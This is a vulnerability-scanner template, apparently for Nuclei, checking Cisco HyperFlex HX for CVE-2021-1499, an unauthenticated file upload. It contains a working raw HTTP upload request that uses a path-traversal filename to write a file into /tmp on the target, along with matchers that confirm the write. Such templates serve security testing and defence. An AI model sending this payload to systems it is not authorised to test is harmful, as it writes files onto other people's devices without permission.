56 lines
1.9 KiB
YAML
56 lines
1.9 KiB
YAML
id: CVE-2021-1499
|
|
|
|
info:
|
|
name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
|
|
author: gy741
|
|
severity: medium
|
|
description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is
|
|
due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload
|
|
files to the affected device with the permissions of the tomcat8 user.
|
|
reference:
|
|
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2021-1499
|
|
cwe-id: CWE-306
|
|
tags: cve,cve2021,cisco,fileupload,intrusive
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /upload HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
|
|
Origin: {{RootURL}}
|
|
Referer: {{RootURL}}
|
|
|
|
-----------------------------253855577425106594691130420583
|
|
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
|
|
Content-Type: application/json
|
|
|
|
MyPasswdNewData->/api/tomcat
|
|
|
|
-----------------------------253855577425106594691130420583--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "application/json"
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- '{"result":'
|
|
- '"filename:'
|
|
- '/tmp/passwd9'
|
|
condition: and
|